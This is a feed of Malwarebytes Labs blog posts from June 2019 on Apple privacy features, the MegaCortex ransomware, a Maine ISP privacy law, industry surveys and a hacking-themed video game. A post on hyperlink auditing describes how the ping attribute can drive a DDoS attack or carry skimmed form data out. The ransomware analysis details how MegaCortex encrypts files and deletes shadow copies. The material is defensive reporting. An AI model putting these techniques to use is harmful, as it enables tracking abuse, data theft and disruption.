Privacy advocates welcomed the feature but warned about over-reliance on Apple as the one true purveyor of privacy.

“Apple’s new sign-in service is definitely a step in the right direction, but it’s important to understand who it’s protecting you from,” said Gennie Gebhart, associate director of research at Electronic Frontier Foundation. “In short, this kind of feature protects you from all sorts of scary third parties but does not necessarily protect you from the company offering it—in this case, Apple.”

Apple has scored positively with EFF’s annual “Who Has Your Back” report, which, for years, evaluated major tech companies for their willingness to fight overbroad, invasive government requests for user data.

But protecting user data from government requests and protecting it from corporate surveillance are different things.

Luckily, Gebhart said, Apple has promised not to use the information it gleans from its SSO feature to track user activity or build profiles from online behavior. But, Gebhart said, the same can’t be assumed from other big tech companies including Google and Facebook.

“[I]t’s important to remember for other SSO services like Facebook’s and Google’s that, even if they implement cool privacy-protective features like Apple has, that won’t necessarily protect you from Facebook or Google tracking your activity,” Gebhart said.

As to whether those companies will actually follow in Apple’s footsteps, Nathalie Maréchal, a senior research analyst at Ranking Digital Rights, seems doubtful, as those competitors rely on entirely different business models.

“Google, Apple’s main competitor in the smartphone market, relies on pervasive data collection at a massive scale not only to sell advertising, but also to train the algorithms that power its products, such as Google Maps,” Maréchal said. “That’s why Google collects as much data as it possibly can: that data is the raw material for its products and services. I don’t see Google shifting to a model where it collects as little information as possible—as Apple says it does—anytime soon.”

That said, Maréchal still commended Apple for offering relay email addresses in its SSO feature.

“This makes the process much more user-friendly, and makes it even harder for data brokers and advertising networks to connect all of someone’s online activity and create a detailed file about them,” Maréchal said.

Yet another researcher, who said it was good to see Apple taking “practical steps” to protect online identities, warned about a larger problem: The increased dependence on a user’s identity as the de facto credential for accessing all sorts of online services and platforms.

“We are seeing more and more websites and apps pushing us to identify ourselves; while sometimes this may be appropriate, it comes along with dangers,” said Tom Fisher, a researcher at Privacy International. “It can be a tool for tracking people across sessions, for instance.”

Fisher continued: “There’s a need for more thought not only on how identification systems can protect people’s privacy, but also when it is appropriate to ask people to identify themselves at all.”

Apple’s new option for location privacy

Apple’s second big feature will give its users the option to more closely manage how their location is tracked by various third-party apps.

With the update to iOS 13, users can choose to share their location “just once” with an app. That means that, if users choose, any service that requests location information—whether it be Yelp when recommending nearby restaurants, Uber when finding nearby drivers, or Fandango when locating nearby movie theaters—will be allowed to access that information just once, and every subsequent request for location information must be approved by the user on an individual basis.

Maréchal called this an important development. She said many apps that request location information provide convenient services for users, and users should have the option to choose between that convenience and that potential loss of privacy. That decision, she said, is unique to each user.

“That’s a very contextual decision and I’m glad to hear that Apple is giving its users more nuanced options than simply ‘on,’ ‘off,’ or ‘only when the app is in use,’” Maréchal said. “For example, I might not want to share my location with Yelp while checking opening hours for a business in my home city, because the privacy trade-off isn’t worth it, and then might share my location while traveling the following week because I don’t know the city I’m visiting well enough to know how far a restaurant is from me.”

Further steps?

When interviewed for this piece, every researcher agreed: Apple’s newest features provide simple, easy-to-use options that can leave users more informed and more in control of their online privacy.

However, another response came up more than once: Apple can—and should—go further.

These responses are not unusual, and, in fact, they follow in the footsteps of all advocacy work, particularly in online privacy. Earlier this year, it was Mozilla, the privacy-forward, nonprofit developer of the web browser Firefox, that asked Apple to do better by its users in protecting them from invasive online tracking. Similarly, it is privacy advocates and researchers who have the most thought-out ideas on protecting user privacy. These researchers had a few ideas for Apple.

First, Maréchal said, Apple should provide “transparency” reports—the way it already does for the government requests it receives for user data—that disclose how third-party apps collect Apple users’ information. She said Apple’s marketing tagline (“What happens on your iPhone, stays on your iPhone”) is only true for the data Apple itself collects, “but it’s not true of data collected by third party apps.”

A Washington Post article last month revealed this to an alarming degree:

“On a recent Monday night, a dozen marketing companies, research firms and other personal data guzzlers got reports from my iPhone. At 11:43 p.m., a company called Amplitude learned my phone number, email and exact location. At 3:58 a.m., another called Appboy got a digital fingerprint of my phone. At 6:25 a.m., a tracker called Demdex received a way to identify my phone and sent back a list of other trackers to pair up with.”

Fisher raised a separate issue regarding Apple’s security updates: Who gets left behind? At such a high price point for the devices (The oldest iPhone model for sale on Apple’s website that is iOS 13 compatible, the Apple iPhone 7, starts at $449), Fisher said, “What happens to people who can’t afford Apple’s expensive products: Are they then left only with access to more invasive ways of identifying themselves?”

Another one of Maréchal’s suggestions could address that problem.

“I would also like some clarity about how long a new iPhone will be guaranteed to receive software updates, as well as a commitment to providing security updates specifically for at least five years,” Maréchal said. “Given how expensive new iPhones can be, customers should know how long the device will be safe to use before they purchase it.”

While this idea does not fix Fisher’s concerns, it at least gives users a better understanding about what they can expect for their own privacy years later. Any company’s decision to put users in more control of their privacy rights is a decision we can sign onto.

The post Apple iOS 13 will better protect user privacy, but more could be done appeared first on Malwarebytes Labs.

Categories: Techie Feeds

MegaCortex continues trend of targeted ransomware attacks

Malwarebytes - Wed, 06/12/2019 - 16:03

MegaCortex is a relatively new ransomware family that continues the 2019 trend of threat actors developing ransomware specifically for targeted attacks on enterprises. While GandCrab apparently shut its doors, several other bespoke, artisanal ransomware families have taken its place, including RobinHood, which shut down the city of Baltimore, Troldesh, and CrySIS/Dharma.

Detected by Malwarebytes as Ransom.MegaCortex, MegaCortex saw a spike in business detections in late May and has since slowed down to a trickle, following a similar trend as its Troldesh and CrySIS forebearers.

Our anti-ransomware technology detected Ransom.MegaCortex even before defintions were added.

Distribution

The methods of distribution for MegaCortex are still not completely clear, but there are indications that the ransomware is dropped on compromised computers by using Trojan downloaders. Once a corporate network has been compromised, the attackers try to gain access to a domain controller and spread across the entire network from there.

Suspected Trojans that might be responsible for the distribution of MegaCortex are Qakbot aka Qbot, Emotet, and Rietspoof. Rietspoof is a multi-stage malware that spreads through instant messaging programs.

Execution

Before the actual ransomware process starts, several tools and scripts are deployed to disable certain security processes and attempt to gain access to the domain controller so the ransomware can be distributed across the network.

Once the ransomware process is activated, it creates these files:

  • ********.log
  • ********.tsv
  • ********.dll

The ******** are eight random characters that are identical for the three files on the affected system. These names are also mentioned in the ransom note called !!!_READ_ME_!!!.txt.

The ransom note, the log file, and the tsv file are all located in the root drive. The dll, on the other hand, can be found in the %temp%  folder.

The encrypted files are given the extension .aes128ctr. The encryption routine skips files with the extensions:

  • .aes128ctr
  • .bat
  • .cmd
  • .config
  • .dll
  • .exe
  • .lnk
  • .manifext
  • .mui
  • .olb
  • .ps1
  • .sys
  • .tlb
  • .tmp

The routine also skips the files:

  • desktop.ini
  • ********.tsv
  • ********.log

It also skips all the files and subfolders under %windir%, with the exception of %windir%\temp. In addition, MegaCortex deletes all the shadow copies on the affected system.

After the encryption routine is complete, MegaCortex displays this rather theatrical ransom note, high on drama and low on grammatical correctness.

Remarkable ransom note quotes

Some notable quotes from the ransom note:

  • “All of your computers have been corrupted with MegaCortex malware that has encrypted your files.” So the name MegaCortex comes from the threat actors themselves, as opposed to the security researchers who discovered it. (That is one way to help the industry to use a unified detection name.)
  • “It is critical that you don’t restart or shutdown your computer.” This implies that one of the seeds for the encryption routine will be made irretrievable if the computer gets rebooted.
  • “The software price will include a guarantee that your company will never be inconvenienced by us.” Is this a tell-tale sign about how much granular control the threat actors have over the malware attacks, or just another empty promise made by criminals?
  • “We can only show you the door. You’re the one who has to walk through it.” A reference to The Matrix or a failed fiction writer?

The ransom note also makes clear that the information necessary for the decryption routine is contained in the randomly named tsv file. So, if all the information except the private key is on the infected computer, does that mean there will be a free decryptor soon? That depends on many other factors, but if the cybercriminals used the same private key for each infection, there could be a possible escape on the horizon.

Undoubtedly it will take some reverse engineering to get definitive answers to these questions, but it certainly gives us some clues.

Countermeasures

Given that the exact infection vector is as of yet unknown, it is hard to give specific protection advice for this ransomware family. But there are some countermeasures that always apply to ransomware attacks, and they might be useful to repeat here:

  • Scan emails with attachments. Suspicious mails with attachments should not reach the end user without being checked first.
  • User education. Users should be taught to refrain from downloading attachments sent to them via mail or instant messaging without close scrutinization.
  • Blacklisting. Most endpoints do not need to be able to run scripts. In those cases, you can blacklist wscript.exe and maybe other scripting options like Powershell.
  • Update software and systems. Updating your systems and your software can plug up vulnerabilities and keep known exploits at bay.
  • Back up files. Reliable and easy-to-deploy backups can shorten the recovery time.

We are far from knowing everything there is to know about this ransomware, but as we discover new information, we will keep our blog readers updated. In the meantime, it is imperative for enterprises to employ best practices for protecting against all ransomware.

After all, we can only show you the door. You’re the one who has to walk through it.

Stay safe, everyone!

The post MegaCortex continues trend of targeted ransomware attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Maine governor signs ISP privacy bill

Malwarebytes - Tue, 06/11/2019 - 16:57

Less than one week after Maine Governor Janet Mills received one of the nation’s most privacy-protective state bills on her desk, she signed it into law. The move makes Maine the latest US state to implement its own online privacy protections.

The law, which will go into effect July 1, 2020, blocks Internet service providers (ISPs) from selling, sharing, or granting third parties access to their customers’ data unless explicitly given approval by those customers. With the changes, Maine residents now have an extra layer of protection for the emails, online chats, browser history, IP addresses, and geolocation data that is commonly collected and stored by companies like Verizon, Comcast, and Spectrum.

In signing the bill, Governor Mills said the people of Maine “value their privacy, online and off.”

“The Internet is a powerful tool, and as it becomes increasingly intertwined with our lives, it is appropriate to take steps to protect the personal information and privacy of Maine people,” said Governor Mills in a released statement. “With this common-sense law, Maine people can access the Internet with the knowledge and comfort that their personal information cannot be bought or sold by their ISPs without their express approval.”

The bill, titled “An Act to Protect the Privacy of Online Customer Information,” was introduced earlier this year by its sponsor, Democratic state Senator Shenna Bellows. It passed through the Maine Legislature’s Committee on Energy, Utilities, and Technology, and gained approval both in the House of Representatives and the Senate soon after. Given until June 11 to sign the bill into law, Governor Mills moved quick, giving her signature on June 6.

As Maine’s lawmakers worked to review and slightly amend the bill (adding a start date to go into effect), it picked up notable supporters, including ACLU of Maine and GSI Inc., a local, small ISP in the state. In an opinion piece published in Bangor Daily News, GSI’s chief executive and chief operating officer voiced strong support for online privacy, saying that “if people can’t trust the Internet, then the value of the Internet is significantly lessened.”

The Maine State Chamber of Commerce opposed the bill, arguing that a new state standard could confuse Maine residents. The Chamber also said the bill was too weak because it did not extend its regulations to some of the Internet’s most noteworthy privacy threats—Silicon Valley companies, including Facebook and Google.

The ACLU of Maine and the Maine State Chamber of Commerce did not return requests for comment about the Governor’s signing.

Sen. Bellows, in the same statement referenced above, commended Maine’s forward action.

“Mainers need to be able to trust that the private data they send online won’t be sold or shared without their knowledge,” Sen. Shenna said. “This law makes Maine first and best in the nation in protecting consumer privacy online.”

The post Maine governor signs ISP privacy bill appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cybersecurity pros think the enemy is winning

Malwarebytes - Tue, 06/11/2019 - 15:00

There is a saying in security that the bad guys are always one step ahead of defense. Two new sets of research reveal that the constant cat-and-a-mouse game is wearing on security professionals, and many feel they are losing in the war against cybercriminals.

The first figures are from the Information Systems Security Association (ISSA) and industry analyst firm Enterprise Strategy Group (ESG). The two polled cybersecurity professionals and found 94 percent of respondents believe that cyber adversaries have a big advantage over cyber defenders—and the balance of power is with the enemy. Most think that advantage will eventually pay off for criminals, as 91 percent believe that most organizations are extremely vulnerable, or somewhat vulnerable, to a significant cyberattack or data breach.

This mirrors Malwarebytes’ own recent research, in which 75 percent of surveyed security professionals admitted that they believe they could be breached in the next one to three years.

What’s behind this defeatist mindset?

In a blog post on the ESG/ISSA research, Jon Oltsik, principal analyst at ESG says in part the lack of confidence exists because criminals are well organized, persistent, and have the time to fail and try a new strategy in order to infiltrate a network. Meanwhile, security managers are always busy and always trying to play catch up.

The skills shortage that is impacting the security field is compounding the sense of vulnerability among organizations. ESG found 53 percent of organizations report a problematic shortage of cybersecurity skills, and 63 percent of organizations continue to fall behind in providing an adequate level of training for their cybersecurity professionals.

“Organizations are looking at the cybersecurity skills crisis in the wrong way: It is a business, not a technical, issue,” said ISSA International President Candy Alexander in response to findings. “In an environment of a ‘seller’s market’ with 77 percent of cybersecurity professionals solicited at least once per month, the research shows in order to retain and grow cybersecurity professionals at all levels, business leaders need to get involved by building a culture of support for security and value the function.”

Where do we go from here?

An entirely new perspective on addressing risk mitigation is required to turn this mindset around. As Alexander notes, security is a business issue, and it needs attention at all levels of the organization.

But the research shows it doesn’t get the respect it deserves, as 23 percent of respondents said business managers don’t understand and/or support an appropriate level of cybersecurity. Business leaders need to send a clear message that cybersecurity is a top priority and invest in security tools and initiatives in turn to reflect this commitment.

This approach is well-supported by research. In fact, a recent report from  Deloitte and the Financial Services Information Sharing and Analysis Center (FS-ISAC) finds top-performing security programs have one thing in common: They have the attention of executive and board leadership, which also means security is seen as a priority throughout the organization.

ESG/ISSA makes other recommendations for changing the thinking about security. They include:

CISO elevation: CISOs and other security executives also need an increased level of respect and should be expected to engage with executive management. Regular audience with the board is critical to getting security the visibility it requires organization-wide.

Practical professional development for security pros:  While 93 percent of survey respondents agree that cybersecurity professionals must keep up with their skills, 66 percent claim that cybersecurity job demands often prevent them from taking part in skills development. Other noted certifications do not hold as much value on the job, with 57 percent noting many credentials are far more useful in getting a job than doing a job. The report suggests prioritizing practical skills development over certifications.

Develop security talent from within: Because the skills gap makes hiring talent more challenging, 41 percent of survey respondents said that their organization has had to recruit and train junior personnel rather than hire more experienced infosec professionals. But this is a creative way to deal with a dearth of qualified talent.

The report recommends designing an internal training program that will foster future talent and loyalty. It also suggests casting a wider net beyond IT and finding transferable business skills and cross career transitions will help expand the pool of talent.

While the overall picture appears as though security progress is slow in business, adjustments in approach and prioritization of security can go a long way in raising the program’s profile throughout the organization. With more time, attention, and respect given to security strategy and risk mitigation, defense in the future can be a step ahead instead of woefully behind the cybercriminal.

The post Cybersecurity pros think the enemy is winning appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (June 3 – 9)

Malwarebytes - Mon, 06/10/2019 - 17:30

Last week on Malwarebytes Labs, we rounded up some leaks and breaches, reported about Magecart skimmers found on Amazon CloudFront CDN, proudly announced we were awarded as Best Cybersecurity Vendor Blog at the annual EU Security Blogger Awards, discussed how Maine inches closer to shutting down ISP pay-for-privacy schemes, asked where our options to disable hyperlink auditing had gone, and presented a video game portrayals of hacking: NITE Team 4.

Other cybersecurity news
  • At Infosecurity Europe, a security expert from Guardicore discussed a new cryptomining malware campaign called Nanshou, and why the cryptojacking threat is set to get worse. (Source: Threatpost)
  • A security breach at a third-party billing collections firm exposed the personal and financial data on as many as 7.7 million medical testing giant LabCorp customers. (Source: Cnet)
  • A researcher has created a module for the Metasploit penetration testing framework that exploits the critical BlueKeep vulnerability on vulnerable Windows XP, 7, and Server 2008 machines to achieve remote code execution. (Source: BleepingComputer)
  • Microsoft’s security researchers have issued a warning about an ongoing spam wave that is spreading emails carrying malicious RTF documents that infect users with malware without user interaction, once users open the RTF documents. (Source: ZDNet)
  • The Federal Trade Commission has issued two administrative complaints and proposed orders which prohibit businesses from using form contract terms that bar consumers from writing or posting negative reviews online. (Source: FTC.gov)
  • Security researchers have discovered a new botnet that has been attacking over 1.5 million Windows systems running a Remote Desktop Protocol (RDP) connection exposed to the Internet. (Source: ZDNet)
  • Microsoft has deleted a massive database of 10 million images which was being used to train facial recognition systems. The database is believed to have been used to train a system operated by police forces and the military. (Source: BBC news)
  • On Tuesday, the Government Accountability Office (GAO) said that the FBI’s Facial Recognition office can now search databases containing more than 641 million photos, including 21 state databases. (Source: NakedSecurity)
  • Despite sharing a common Chromium codebase, browser makers like Brave, Opera, and Vivaldi don’t have plans on crippling support for ad blocker extensions in their products—as Google is currently planning on doing within Chrome. (Source: ZDNet)
  • Traffic destined for some of Europe’s biggest mobile providers was misdirected in a roundabout path through the Chinese-government-controlled China Telecom on Thursday, in some cases for more than two hours. (Source: ArsTechnica)

Stay safe, everyone!

The post A week in security (June 3 – 9) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Video game portrayals of hacking: NITE Team 4

Malwarebytes - Fri, 06/07/2019 - 16:52

Note: The developers of NITE Team 4 granted the blog author access to the game plus DLC content.

A little while ago, an online acquaintance of mine asked if a new video game based on hacking called NITE Team 4 was in any way realistic, or “doable” in terms of the types of hacking it portrayed (accounting for the necessary divergences from how things would work outside of a scripted, plot-goes-here environment).

The developers, AliceandSmith, generously gave me a key for the game, so I’ve spent the last month or so slowly working my way through the content. I’ve not completed it yet, but what I’ve explored is enough to feel confident in making several observations. This isn’t a review; I’m primarily interested in the question: “How realistic is this?”

What is it?

NITE Team 4 is an attempt at making a grounded game focused on a variety of hacking techniques—some of which researchers of various coloured hats may (or may not!) experience daily. It does this by allowing you full use of the so-called “Stinger OS,” their portrayal of a dedicated hacking system able to run queries and operate advanced hacking tools as you take the role of a computer expert in a government-driven secret organisation.

Is it like other hacking games?

Surprisingly, it isn’t. I’ve played a lot of hacking games through the years. They generally fall into two camps. The first are terrible mini-games jammed into unrelated titles that don’t have any resemblance to “hacking” in any way whatsoever. You know what I’m talking about: They’re the bits flagged as “worst part of the game” whenever you talk to a friend about any form of digital entertainment.

The second camp is the full-fledged hacking game, the type based entirely around some sort of stab at a hacking title. The quality is variable, but often they have a specific look and act a certain way.

Put simply, the developers usually emigrate to cyberpunk dystopia land and never come back. Every hacker cliché in the book is wheeled out, and as for the actual hacking content, it usually comes down to abstractions of what the developer assumes hacking might be like, rather than something that it actually resembles.

In other words: You’re not really hacking or doing something resembling hacking. It’s really just numbers replacing health bars. Your in-game computer is essentially just another role-playing character, only instead of a magic pool you have a “hacking strength meter” or something similar. Your modem is your stamina bar, your health bar is replaced by something to do with GPU strength, and so on.

They’re fun, but it’s a little samey after a while.

Meanwhile, in NITE Team 4: I compromised Wi-Fi enabled billboards to track the path of the potentially kidnapped owner of a mobile phone.

Click to enlarge

I used government tools to figure out the connection between supposedly random individuals by cross referencing taxi records and payment stubs. I figured out which mobile phone a suspect owns by using nearby Wi-Fi points to build a picture of their daily routine.

Click to enlarge

I made use of misconfigured server settings to view ID cards belonging to multiple companies looking for an insider threat.

I performed a Man-in-the-Middle attack to sniff network traffic and made use of the Internet of Things to flag a high-level criminal suspect on a heatmap.

Click to enlarge

If it sounds a little different, that’s because it is. We’re way beyond the old “Press H to Hack” here.

Logging on

Even the title screen forced me to weigh up some serious security choices: Do I allow the terminal to store my account username and password? Will there be in game repercussions for this down the line? Or do I store my fictitious not-real video game login in a text file on my very-real desktop?

Click to enlarge

All important decisions. (If you must know, I wrote the password on a post-it note. I figure if someone breaks in, I have more pressing concerns than a video game login. You’re not hacking my Gibson, fictitious nation state attackers).

Getting this show on the road

Your introduction to digital shenanigans isn’t for the faint of heart. As with many games of this nature, there’s a tutorial—and what a tutorial.

Spread across three sections covering basic terminal operations, digital forensics, and network intrusion, there’s no fewer than 15 specific tutorials, and each of those contains multiple components.

I can’t think of any other hacking-themed game where, before I could even consider touching the first mission, I had to tackle:

Basic command line tools, basic and advanced OSINT (open source intelligence), mobile forensics, Wi-Fi compromise, social engineering via the art of phishing toolkits, MiTM (Man in the Middle), making use of exploit databases, and even a gamified version of the infamous NSA tool Xkeyscore.

When you take part in a game tutorial that suggests users of Kali and Metasploit may be familiar with some aspects of the interface, or happily links to real-world examples of tools and incidents, you know you’re dealing with something that has a solid grounding in “how this stuff actually works.”

Click to enlarge

In fact, a large portion of my time was spent happily cycling through the tutorial sections and figuring out how to complete each mini objective. If you’d told me the entire game was those tutorials, I’d probably have been happy with that.

What play styles are available?

The game is fairly aligned to certain types of Red Team actions, primarily reconnaissance and enumeration. You could honestly just read an article such as this and have a good idea of how the game is expected to pan out. Now, a lot of other titles do this to some degree. What’s novel here is the variety of approaches on offer to the budding hacker.

There are several primary mission types: The (so far) four chapter long main mission story, which seems to shape at least certain aspects based on choices made earlier on. This is where the most…Hollywood?…aspects of the story surrounding the hacking seem to reside. In fairness, they do assign a “real life” rating to each scenario and most of them tend to err on the side of “probably not happening,” which is fair enough.

The second type of mission is the daily bounties, where various government agencies offer you rewards for hacking various systems or gathering intel on specific targets. I won’t lie: The interface has defeated me here, and I can’t figure out how to start one. It’s probably something incredibly obvious. They’ll probably make me turn in my hacker badge and hacker gun.

Last of all—and most interesting—are the real world scenarios. These roughly resemble the main missions, but with the added spice of having to leave the game to go fact finding. You may have to hunt around in Google, or look for clues scattered across the Internet by the game developers.

Each mission comes with a briefing document explaining what you have to do, and from there on in, it’s time to grab what information you can lying around online (for real) and pop your findings back into the game.

Click to enlarge

In keeping with the somewhat less Hollywood approach, the tasks and mission backgrounds are surprisingly serious and the monthly releases seem to follow “what if” stories about current events.

They deal with everything from infiltrating Emannuel Macron’s files (topical!) to tackling methamphetamine shipments in South Korea, and helping to extract missing journalists investigating the internment of religious minorities in China. As I said…surprisingly serious.

Getting your gameface on

Most tasks begin by doing what you’d expect—poking around on the Internet for clues. When hackers want to compromise websites or servers, they often go Google Dorking. This is essentially hunting round in search engines for telltale signs of passwords, or exposed databases, or other things a website or server should keep hidden, but the admin hasn’t been paying enough attention.

The idea in NITE Team 4 is to rummage around for subdomains and other points of interest that should’ve been hidden from sight and then exploit them ruthlessly. Different combinations of search and different tools provided by Stinger OS produce different results.

Once you have half a dozen subdomains, then you begin to fingerprint each one and check for vulnerabilities. As is common throughout the game, you don’t get any sort of step-by-step walkthrough on how to break into servers for real. Many key tasks are missed out because it probably wouldn’t make for an interesting game, and frankly there’s already more than enough here to try and figure out while keeping it accessible to newcomers.

Should you find a vulnerable subdomain, it’s then time to run the custom-made vulnerability database provided by Stinger OS, and then fire up the compromise tool (possibly the most “gamey” part of the process) that involves dragging and dropping aspects of the described vulnerability into the hacking tool and breaking into the computer/server/mobile phone.

From there, the mission usually diverges into aspects of security not typically covered in games. If anything, the nuts and bolts terminal stuff is less of a focus than working out how to exploit the fictitious targets away from your Stinger terminal. It feels a lot more realistic to me as a result.

What else can you do?

Before long, you’ll be trying various combinations of data about targets, and their day-to-day life, in the game’s XKeyscore tool to figure out patterns and reveal more information.

Click to enlarge

You’ll be using one of your VPNs to access a compromised network and use several techniques to crack a password. Maybe you won’t need to do that at all, because the target’s phone you just compromised has the password in plaintext in an SMS they sent their boss. What will you do if the password isn’t a password, but a clue to the password?

Click to enlarge

Once obtained, it might help reveal the location of a rogue business helping an insider threat hijack legitimate networks. How will you take them down? Will you try and break into their server? Could that be a trap? Perhaps you grabbed an email from the business card you downloaded. Is it worth firing up the phishing toolkit and trying to craft a boobytrapped email?

Click to enlarge

Would they be more likely to fall for a Word document or a Flash file? Should the body text resemble an accounting missive, or would a legal threat be more effective?

I hear those IoT smart homes are somewhat vulnerable these days. Anyone for BBQ?

Click to enlarge

…and so on.

I don’t want to give too much away, as it’s really worth discovering these things for yourself.

Hack the planet?

I mentioned earlier that I’d have been happy with just the tutorials to play around in. You’re not going to pop a shell or steal millions from a bank account by playing this game because ultimately it’s just that—a game. You’re dropped into specific scenarios, told to get from X to Y, and then you’re left to your own devices inside the hacker sandbox. If you genuinely want to try and tackle some of the basics of the trade, you should talk to security pros, ask for advice, go to conferences, take up a few courses, or try and grab the regular Humble Hacking Bundles.

Occasionally I got stuck and couldn’t figure out if I was doing something wrong, or the game was. Sometimes it expected you to input something as it presented it to you but didn’t mention you’d need to leave off the “/” at the end. Elsewhere, I was supposed to crack a password but despite following the instructions to the letter, it simply wouldn’t work—until it did.

Despite this, I don’t think I’ve played a game based on hacking with so many diverse aspects to it.

Bottom line: Is it realistic?

The various storyline scenarios are by necessity a little “out there.” You’re probably not going to see someone blowing up a house in Germany via remote controlled Hellfire missile strike anytime soon. But in terms of illustrating how many tools people working in this area use, how they use lateral thinking and clever connections to solve a puzzle and get something done, it’s fantastic. There are multiple aspects of this—particularly where dealing with OSINT, making connections, figuring out who did what and where are concerned—that I recognise.

While I was tying up this blog post, I discovered the developers are producing special versions of it for training. This doesn’t surprise me; I could imagine this has many applications, including making in-house custom security policy training a lot more fun and interesting for non infosec employees.

Is this the best hacking game ever made? I couldn’t possibly say. Is it the most fleshed out? I would say so, and anyone looking for an occasionally tricky gamified introduction to digital jousting should give it a look. I’d have loved something like this when I was growing up, and if it helps encourage teenagers (or anyone else, for that matter) to look at security as a career option, then that can only be a bonus.

The post Video game portrayals of hacking: NITE Team 4 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hyperlink auditing: where has my option to disable it gone?

Malwarebytes - Thu, 06/06/2019 - 16:59

There is a relatively old method that might be gaining traction to follow users around on the world wide web.

Most Internet users are aware of the fact that they are being tracked in several ways. (And awareness is a good start.) In a state of awareness, you can adjust your behavior accordingly, and if you feel it’s necessary, you can take countermeasures.

Which is why we want to bring the practice of link auditing to your attention: to make you aware of its existence, if you weren’t already. For those already in the know, you might be surprised to learn that browsers are taking away your option to disable hyperlink auditing.

What is hyperlink auditing?

Hyperlink auditing is a method for website builders to track which links on their site have been clicked on by visitors, and where these links point to. Hyperlink auditing is sometimes referred to as “pings.” This is because “ping” is the name of the link attribute hyperlink auditing uses to do the tracking.

From a technical perspective, hyperlink auditing is an HTML standard that allows the creation of special links that ping back to a specified URL when they are clicked on. These pings are done in the form of a POST request to the specified web page that can then examine the request headers to see what page the link was clicked on.

The syntax of this HTML5 feature is easy. A website builder can use this syntax to use hyperlink auditing:

<a href=”{destination url}” ping=”{url that receives the information}”>

Under normal circumstances, the second URL will point to some kind of script that will sort and store the received information to help generate tracking and usage information for the site. This can be done on the same domain, but it can also point to another domain or IP where the data can be processed.

What’s the difference between this and normal tracking?

Some of you might argue that there are other ways to track where we go and what we click. And you would be right. But these other methods use Javascripts, and browser users can choose whether they allow scripts to run or not. Hyperlink auditing does not give users this choice. If the browser allows it, it will work.

Which browsers allow link auditing?

Almost every browser allows hyperlink tracking, but until now they offered an option to disable it. However, now major browsers are removing the option for their users to disallow hyperlink auditing.

As of presstime, Chrome, Edge, Opera, and Safari already allow link auditing by default and offer no option to disable it. Firefox has plans to follow suit in the near future, which is surprising as Firefox is one of the few browsers that has it disabled by default. Firefox users can check the setting for hyperlink auditing under about:config >  browser.send_pings.

How can I stop link auditing?

You can’t detect the presence of the “ping” attribute by hovering over a link, so you would have to examine the code of the site to check whether a link has that attribute or not. Or, for more novice users, there are some dedicated browser extensions that block link auditing. For Chrome users, there is an extension called Ping Blocker available in the webstore.

Or you can resort to using a browser that is more privacy focused.

Please read: How to tighten security and increase privacy on your browser

Test if your browser allows hyperlink auditing

The link I posted below is harmless and pings the test IP that we have created especially to check whether the Malwarebytes web protection module is working without actually sending you to a malicious site. So this test will show a warning prompt if the following conditions are met:

  • Malwarebytes Web Protection module is enabled
  • You are allowing Malwarebytes notifications (Settings > Notifications)
  • Your browser allows link auditing

Create a textfile with the code posted below in it and save it as a html file. Rightclick the html file and choose to open it with the browser you want to test. If the browser allows link auditing, then you should see the warning shown below when you click this link:

<a href="https://blog.malwarebytes.com" ping="https://iptest.malwarebytes.com">The ping in this link will be blocked by MBAM</a> Malwarebytes and hyperlink auditing

As demonstrated above, Malwarebytes will protect you if either one of the URLs in a link leads to a known malicious domain or IP. There are no immediate plans to integrate anti-ping functionality in our browser extensions, but it is under consideration. Should the need arise for this functionality to be integrated in any of our products, we will lend a listening ear to our customers.

Abuse of hyperlink auditing

Hyperlink auditing has reportedly been used in a DDoS attack. The attack involved users that visited a crafted web page with two external JavaScript files. One of these included an array containing URLs: the targets of the DDoS attack. The second JavaScript randomly selected a URL from the array, created the <a> tag with a ping attribute, and programmatically clicked the link every second.

Skimmers could use hyperlink auditing if they figure out how to send form field information to a site under their control. If they would be able to plant a script on a site, like they usually do, but in this case use it to “ping” the data to their own site, this would be a method that is hard to block or notice by the visitors of the site.

Countermeasures

At the moment, there doesn’t seem to be an urgent need to block hyperlink auditing for the average Internet user. The only real problem here is that it takes third-party software to disable hyperlink auditing when browsers should be offering us that option in their settings. For the more careful Internet users that had disabled hyperlink auditing earlier, it is recommended to check whether that setting is still effectively working on the browser. The option could be removed after every update and you could have missed that this happened.

Stay safe everyone!

The post Hyperlink auditing: where has my option to disable it gone? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes Labs wins best cybersecurity vendor blog at InfoSec’s European Security Blogger Awards

Malwarebytes - Wed, 06/05/2019 - 19:21

Infosec Europe is now well underway, and last night was the annual EU Security Blogger Awards, where InfoSecurity Magazine:

…recognise[s] the best blogs in the industry as first nominated by peers and then judged by a panel of (mostly) respected industry experts.

Malwarebytes Labs was announced as winner of the Best Cybersecurity Vendor Blog. We previously won best corporate security blog in 2015 and 2016, and we were delighted to see we had several other nominations this year:

  • Best commercial Twitter account (@Malwarebytes)
  • Most educational blog for user awareness
  • Security hall of fame (for our own Jérôme Segura)
  • Grand Prix for best overall blog

It’s excellent to be recognised alongside such legendary security pros as Graham Cluley, Mikko Hyppönen, and Troy Hunt, as well as fellow security companies Tripwire, Sophos, Bitdefender, and many others. Without further ado, let’s see who won in the various categories.

The n00bs: Best new cybersecurity podcast

WINNER: Darknet Diaries

The n00bs: Best new/up and coming blog

WINNER: The Many Hats Club

The corporates: Best cybersecurity vendor blog

WINNER: Malwarebytes

The corporates: Best commercial Twitter account

WINNER: NCSC

Best cybersecurity podcast

WINNER: Smashing Security

Best cybersecurity video or cybersecurity video blog

WINNER: Jenny Radcliffe

Best personal (non-commercial) security blog

WINNER: 5w0rdFish

Most educational blog for user awareness

WINNER: NCSC

Most entertaining blog

WINNER: J4VV4D

Best technical blog

WINNER: Kevin Beaumont

Best Tweeter

WINNER: Quentynblog

Best Instagrammer

WINNER: Lausecurity

The legends of cybersecurity: hall of fame

WINNER: Troy Hunt

Grand Prix for best overall security blog

WINNER: Graham Cluley

Thank you!

We did indeed win an award thanks to your votes, and we can now set our Best Cybersecurity Vendor Blog trophy next to our two awards for Best Corporate Blog. We’ll continue to provide our readers with breaking news, in-depth research, educational guides on best practices, conference coverage, and much, much more.

We appreciate your votes, especially when there are so many excellent blogs out there, and we hope you might even find a few more valuable sources of information from the links above.

Congratulations to the winners, commiserations to everyone else, a hat-tip to the organisers, and a final round of applause to our readers. We couldn’t have done it without you.

